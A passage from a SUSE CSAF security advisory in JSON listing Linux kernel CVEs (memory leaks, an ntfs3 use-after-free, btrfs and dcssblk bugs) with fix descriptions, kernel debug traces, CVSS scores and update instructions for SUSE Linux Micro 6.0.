"text": "https://www.suse.com/security/cve/CVE-2023-54106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fix potential memory leak in mlx5e_init_rep_rx\n\nThe memory pointed to by the priv-\u003erx_res pointer is not freed in the error\npath of mlx5e_init_rep_rx, which can lead to a memory leak. Fix by freeing\nthe memory in the error path, thereby making the error path identical to\nmlx5e_cleanup_rep_rx().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54106",
"url": "https://www.suse.com/security/cve/CVE-2023-54106"
},
{
"category": "external",
"summary": "SUSE Bug 1256358 for CVE-2023-54106",
"url": "https://bugzilla.suse.com/1256358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54106"
},
{
"cve": "CVE-2023-54112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix memory leak in error path of kcm_sendmsg()\n\nsyzbot reported a memory leak like below:\n\nBUG: memory leak\nunreferenced object 0xffff88810b088c00 (size 240):\n comm \"syz-executor186\", pid 5012, jiffies 4294943306 (age 13.680s)\n hex dump (first 32 bytes):\n 00 89 08 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffffffff83e5d5ff\u003e] __alloc_skb+0x1ef/0x230 net/core/skbuff.c:634\n [\u003cffffffff84606e59\u003e] alloc_skb include/linux/skbuff.h:1289 [inline]\n [\u003cffffffff84606e59\u003e] kcm_sendmsg+0x269/0x1050 net/kcm/kcmsock.c:815\n [\u003cffffffff83e479c6\u003e] sock_sendmsg_nosec net/socket.c:725 [inline]\n [\u003cffffffff83e479c6\u003e] sock_sendmsg+0x56/0xb0 net/socket.c:748\n [\u003cffffffff83e47f55\u003e] ____sys_sendmsg+0x365/0x470 net/socket.c:2494\n [\u003cffffffff83e4c389\u003e] ___sys_sendmsg+0xc9/0x130 net/socket.c:2548\n [\u003cffffffff83e4c536\u003e] __sys_sendmsg+0xa6/0x120 net/socket.c:2577\n [\u003cffffffff84ad7bb8\u003e] do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n [\u003cffffffff84ad7bb8\u003e] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\n [\u003cffffffff84c0008b\u003e] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nIn kcm_sendmsg(), kcm_tx_msg(head)-\u003elast_skb is used as a cursor to append\nnewly allocated skbs to \u0027head\u0027. If some bytes are copied, an error occurred,\nand jumped to out_error label, \u0027last_skb\u0027 is left unmodified. A later\nkcm_sendmsg() will use an obsoleted \u0027last_skb\u0027 reference, corrupting the\n\u0027head\u0027 frag_list and causing the leak.\n\nThis patch fixes this issue by properly updating the last allocated skb in\n\u0027last_skb\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54112",
"url": "https://www.suse.com/security/cve/CVE-2023-54112"
},
{
"category": "external",
"summary": "SUSE Bug 1256354 for CVE-2023-54112",
"url": "https://bugzilla.suse.com/1256354"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54112"
},
{
"cve": "CVE-2023-54113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcu: dump vmalloc memory info safely\n\nCurrently, for double invoke call_rcu(), will dump rcu_head objects memory\ninfo, if the objects is not allocated from the slab allocator, the\nvmalloc_dump_obj() will be invoke and the vmap_area_lock spinlock need to\nbe held, since the call_rcu() can be invoked in interrupt context,\ntherefore, there is a possibility of spinlock deadlock scenarios.\n\nAnd in Preempt-RT kernel, the rcutorture test also trigger the following\nlockdep warning:\n\nBUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48\nin_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0\npreempt_count: 1, expected: 0\nRCU nest depth: 1, expected: 1\n3 locks held by swapper/0/1:\n #0: ffffffffb534ee80 (fullstop_mutex){+.+.}-{4:4}, at: torture_init_begin+0x24/0xa0\n #1: ffffffffb5307940 (rcu_read_lock){....}-{1:3}, at: rcu_torture_init+0x1ec7/0x2370\n #2: ffffffffb536af40 (vmap_area_lock){+.+.}-{3:3}, at: find_vmap_area+0x1f/0x70\nirq event stamp: 565512\nhardirqs last enabled at (565511): [\u003cffffffffb379b138\u003e] __call_rcu_common+0x218/0x940\nhardirqs last disabled at (565512): [\u003cffffffffb5804262\u003e] rcu_torture_init+0x20b2/0x2370\nsoftirqs last enabled at (399112): [\u003cffffffffb36b2586\u003e] __local_bh_enable_ip+0x126/0x170\nsoftirqs last disabled at (399106): [\u003cffffffffb43fef59\u003e] inet_register_protosw+0x9/0x1d0\nPreemption disabled at:\n[\u003cffffffffb58040c3\u003e] rcu_torture_init+0x1f13/0x2370\nCPU: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.5.0-rc4-rt2-yocto-preempt-rt+ #15\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x68/0xb0\n dump_stack+0x14/0x20\n __might_resched+0x1aa/0x280\n ? __pfx_rcu_torture_err_cb+0x10/0x10\n rt_spin_lock+0x53/0x130\n ? find_vmap_area+0x1f/0x70\n find_vmap_area+0x1f/0x70\n vmalloc_dump_obj+0x20/0x60\n mem_dump_obj+0x22/0x90\n __call_rcu_common+0x5bf/0x940\n ? debug_smp_processor_id+0x1b/0x30\n call_rcu_hurry+0x14/0x20\n rcu_torture_init+0x1f82/0x2370\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_leak_cb+0x10/0x10\n ? __pfx_rcu_torture_init+0x10/0x10\n do_one_initcall+0x6c/0x300\n ? debug_smp_processor_id+0x1b/0x30\n kernel_init_freeable+0x2b9/0x540\n ? __pfx_kernel_init+0x10/0x10\n kernel_init+0x1f/0x150\n ret_from_fork+0x40/0x50\n ? __pfx_kernel_init+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nThe previous patch fixes this by using the deadlock-safe best-effort\nversion of find_vm_area. However, in case of failure print the fact that\nthe pointer was a vmalloc pointer so that we print at least something.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54113",
"url": "https://www.suse.com/security/cve/CVE-2023-54113"
},
{
"category": "external",
"summary": "SUSE Bug 1256351 for CVE-2023-54113",
"url": "https://bugzilla.suse.com/1256351"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54113"
},
{
"cve": "CVE-2023-54115",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54115"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npcmcia: rsrc_nonstatic: Fix memory leak in nonstatic_release_resource_db()\n\nWhen nonstatic_release_resource_db() frees all resources associated\nwith an PCMCIA socket, it forgets to free socket_data too, causing\na memory leak observable with kmemleak:\n\nunreferenced object 0xc28d1000 (size 64):\n comm \"systemd-udevd\", pid 297, jiffies 4294898478 (age 194.484s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 f0 85 0e c3 00 00 00 00 ................\n 00 00 00 00 0c 10 8d c2 00 00 00 00 00 00 00 00 ................\n backtrace:\n [\u003cffda4245\u003e] __kmem_cache_alloc_node+0x2d7/0x4a0\n [\u003c7e51f0c8\u003e] kmalloc_trace+0x31/0xa4\n [\u003cd52b4ca0\u003e] nonstatic_init+0x24/0x1a4 [pcmcia_rsrc]\n [\u003ca2f13e08\u003e] pcmcia_register_socket+0x200/0x35c [pcmcia_core]\n [\u003ca728be1b\u003e] yenta_probe+0x4d8/0xa70 [yenta_socket]\n [\u003cc48fac39\u003e] pci_device_probe+0x99/0x194\n [\u003c84b7c690\u003e] really_probe+0x181/0x45c\n [\u003c8060fe6e\u003e] __driver_probe_device+0x75/0x1f4\n [\u003cb9b76f43\u003e] driver_probe_device+0x28/0xac\n [\u003c648b766f\u003e] __driver_attach+0xeb/0x1e4\n [\u003c6e9659eb\u003e] bus_for_each_dev+0x61/0xb4\n [\u003c25a669f3\u003e] driver_attach+0x1e/0x28\n [\u003cd8671d6b\u003e] bus_add_driver+0x102/0x20c\n [\u003cdf0d323c\u003e] driver_register+0x5b/0x120\n [\u003c942cd8a4\u003e] __pci_register_driver+0x44/0x4c\n [\u003ce536027e\u003e] __UNIQUE_ID___addressable_cleanup_module188+0x1c/0xfffff000 [iTCO_vendor_support]\n\nFix this by freeing socket_data too.\n\nTested on a Acer Travelmate 4002WLMi by manually binding/unbinding\nthe yenta_cardbus driver (yenta_socket).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54115",
"url": "https://www.suse.com/security/cve/CVE-2023-54115"
},
{
"category": "external",
"summary": "SUSE Bug 1256121 for CVE-2023-54115",
"url": "https://bugzilla.suse.com/1256121"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54115"
},
{
"cve": "CVE-2023-54117",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54117"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/dcssblk: fix kernel crash with list_add corruption\n\nCommit fb08a1908cb1 (\"dax: simplify the dax_device \u003c-\u003e gendisk\nassociation\") introduced new logic for gendisk association, requiring\ndrivers to explicitly call dax_add_host() and dax_remove_host().\n\nFor dcssblk driver, some dax_remove_host() calls were missing, e.g. in\ndevice remove path. The commit also broke error handling for out_dax case\nin device add path, resulting in an extra put_device() w/o the previous\nget_device() in that case.\n\nThis lead to stale xarray entries after device add / remove cycles. In the\ncase when a previously used struct gendisk pointer (xarray index) would be\nused again, because blk_alloc_disk() happened to return such a pointer, the\nxa_insert() in dax_add_host() would fail and go to out_dax, doing the extra\nput_device() in the error path. In combination with an already flawed error\nhandling in dcssblk (device_register() cleanup), which needs to be\naddressed in a separate patch, this resulted in a missing device_del() /\nklist_del(), and eventually in the kernel crash with list_add corruption on\na subsequent device_add() / klist_add().\n\nFix this by adding the missing dax_remove_host() calls, and also move the\nput_device() in the error path to restore the previous logic.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54117",
"url": "https://www.suse.com/security/cve/CVE-2023-54117"
},
{
"category": "external",
"summary": "SUSE Bug 1256348 for CVE-2023-54117",
"url": "https://bugzilla.suse.com/1256348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54117"
},
{
"cve": "CVE-2023-54121",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54121"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix incorrect splitting in btrfs_drop_extent_map_range\n\nIn production we were seeing a variety of WARN_ON()\u0027s in the extent_map\ncode, specifically in btrfs_drop_extent_map_range() when we have to call\nadd_extent_mapping() for our second split.\n\nConsider the following extent map layout\n\n\tPINNED\n\t[0 16K) [32K, 48K)\n\nand then we call btrfs_drop_extent_map_range for [0, 36K), with\nskip_pinned == true. The initial loop will have\n\n\tstart = 0\n\tend = 36K\n\tlen = 36K\n\nwe will find the [0, 16k) extent, but since we are pinned we will skip\nit, which has this code\n\n\tstart = em_end;\n\tif (end != (u64)-1)\n\t\tlen = start + len - em_end;\n\nem_end here is 16K, so now the values are\n\n\tstart = 16K\n\tlen = 16K + 36K - 16K = 36K\n\nlen should instead be 20K. This is a problem when we find the next\nextent at [32K, 48K), we need to split this extent to leave [36K, 48k),\nhowever the code for the split looks like this\n\n\tsplit-\u003estart = start + len;\n\tsplit-\u003elen = em_end - (start + len);\n\nIn this case we have\n\n\tem_end = 48K\n\tsplit-\u003estart = 16K + 36K // this should be 16K + 20K\n\tsplit-\u003elen = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K\n\nand now we have an invalid extent_map in the tree that potentially\noverlaps other entries in the extent map. Even in the non-overlapping\ncase we will have split-\u003estart set improperly, which will cause problems\nwith any block related calculations.\n\nWe don\u0027t actually need len in this loop, we can simply use end as our\nend point, and only adjust start up when we find a pinned extent we need\nto skip.\n\nAdjust the logic to do this, which keeps us from inserting an invalid\nextent map.\n\nWe only skip_pinned in the relocation case, so this is relatively rare,\nexcept in the case where you are running relocation a lot, which can\nhappen with auto relocation on.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54121",
"url": "https://www.suse.com/security/cve/CVE-2023-54121"
},
{
"category": "external",
"summary": "SUSE Bug 1256267 for CVE-2023-54121",
"url": "https://bugzilla.suse.com/1256267"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54121"
},
{
"cve": "CVE-2023-54125",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54125"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Return error for inconsistent extended attributes\n\nntfs_read_ea is called when we want to read extended attributes. There\nare some sanity checks for the validity of the EAs. However, it fails to\nreturn a proper error code for the inconsistent attributes, which might\nlead to unpredicted memory accesses after return.\n\n[ 138.916927] BUG: KASAN: use-after-free in ntfs_set_ea+0x453/0xbf0\n[ 138.923876] Write of size 4 at addr ffff88800205cfac by task poc/199\n[ 138.931132]\n[ 138.933016] CPU: 0 PID: 199 Comm: poc Not tainted 6.2.0-rc1+ #4\n[ 138.938070] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n[ 138.947327] Call Trace:\n[ 138.949557] \u003cTASK\u003e\n[ 138.951539] dump_stack_lvl+0x4d/0x67\n[ 138.956834] print_report+0x16f/0x4a6\n[ 138.960798] ? ntfs_set_ea+0x453/0xbf0\n[ 138.964437] ? kasan_complete_mode_report_info+0x7d/0x200\n[ 138.969793] ? ntfs_set_ea+0x453/0xbf0\n[ 138.973523] kasan_report+0xb8/0x140\n[ 138.976740] ? ntfs_set_ea+0x453/0xbf0\n[ 138.980578] __asan_store4+0x76/0xa0\n[ 138.984669] ntfs_set_ea+0x453/0xbf0\n[ 138.988115] ? __pfx_ntfs_set_ea+0x10/0x10\n[ 138.993390] ? kernel_text_address+0xd3/0xe0\n[ 138.998270] ? __kernel_text_address+0x16/0x50\n[ 139.002121] ? unwind_get_return_address+0x3e/0x60\n[ 139.005659] ? __pfx_stack_trace_consume_entry+0x10/0x10\n[ 139.010177] ? arch_stack_walk+0xa2/0x100\n[ 139.013657] ? filter_irq_stacks+0x27/0x80\n[ 139.017018] ntfs_setxattr+0x405/0x440\n[ 139.022151] ? __pfx_ntfs_setxattr+0x10/0x10\n[ 139.026569] ? kvmalloc_node+0x2d/0x120\n[ 139.030329] ? kasan_save_stack+0x41/0x60\n[ 139.033883] ? kasan_save_stack+0x2a/0x60\n[ 139.037338] ? kasan_set_track+0x29/0x40\n[ 139.040163] ? kasan_save_alloc_info+0x1f/0x30\n[ 139.043588] ? __kasan_kmalloc+0x8b/0xa0\n[ 139.047255] ? __kmalloc_node+0x68/0x150\n[ 139.051264] ? kvmalloc_node+0x2d/0x120\n[ 139.055301] ? vmemdup_user+0x2b/0xa0\n[ 139.058584] __vfs_setxattr+0x121/0x170\n[ 139.062617] ? __pfx___vfs_setxattr+0x10/0x10\n[ 139.066282] __vfs_setxattr_noperm+0x97/0x300\n[ 139.070061] __vfs_setxattr_locked+0x145/0x170\n[ 139.073580] vfs_setxattr+0x137/0x2a0\n[ 139.076641] ? __pfx_vfs_setxattr+0x10/0x10\n[ 139.080223] ? __kasan_check_write+0x18/0x20\n[ 139.084234] do_setxattr+0xce/0x150\n[ 139.087768] setxattr+0x126/0x140\n[ 139.091250] ? __pfx_setxattr+0x10/0x10\n[ 139.094948] ? __virt_addr_valid+0xcb/0x140\n[ 139.097838] ? __call_rcu_common.constprop.0+0x1c7/0x330\n[ 139.102688] ? debug_smp_processor_id+0x1b/0x30\n[ 139.105985] ? kasan_quarantine_put+0x5b/0x190\n[ 139.109980] ? putname+0x84/0xa0\n[ 139.113886] ? __kasan_slab_free+0x11e/0x1b0\n[ 139.117961] ? putname+0x84/0xa0\n[ 139.121316] ? preempt_count_sub+0x1c/0xd0\n[ 139.124427] ? __mnt_want_write+0xae/0x100\n[ 139.127836] ? mnt_want_write+0x8f/0x150\n[ 139.130954] path_setxattr+0x164/0x180\n[ 139.133998] ? __pfx_path_setxattr+0x10/0x10\n[ 139.137853] ? __pfx_ksys_pwrite64+0x10/0x10\n[ 139.141299] ? debug_smp_processor_id+0x1b/0x30\n[ 139.145714] ? fpregs_assert_state_consistent+0x6b/0x80\n[ 139.150796] __x64_sys_setxattr+0x71/0x90\n[ 139.155407] do_syscall_64+0x3f/0x90\n[ 139.159035] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n[ 139.163843] RIP: 0033:0x7f108cae4469\n[ 139.166481] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 088\n[ 139.183764] RSP: 002b:00007fff87588388 EFLAGS: 00000286 ORIG_RAX: 00000000000000bc\n[ 139.190657] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f108cae4469\n[ 139.196586] RDX: 00007fff875883b0 RSI: 00007fff875883d1 RDI: 00007fff875883b6\n[ 139.201716] RBP: 00007fff8758c530 R08: 0000000000000001 R09: 00007fff8758c618\n[ 139.207940] R10: 0000000000000006 R11: 0000000000000286 R12: 00000000004004c0\n[ 139.214007] R13: 00007fff8758c610 R14: 0000000000000000 R15\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54125",
"url": "https://www.suse.com/security/cve/CVE-2023-54125"
},
{
"category": "external",
"summary": "SUSE Bug 1256117 for CVE-2023-54125",
"url": "https://bugzilla.suse.com/1256117"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54125"
},
{
"cve": "CVE-2023-54127",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54127"
}
],
"notes": [
{
"category": "general",
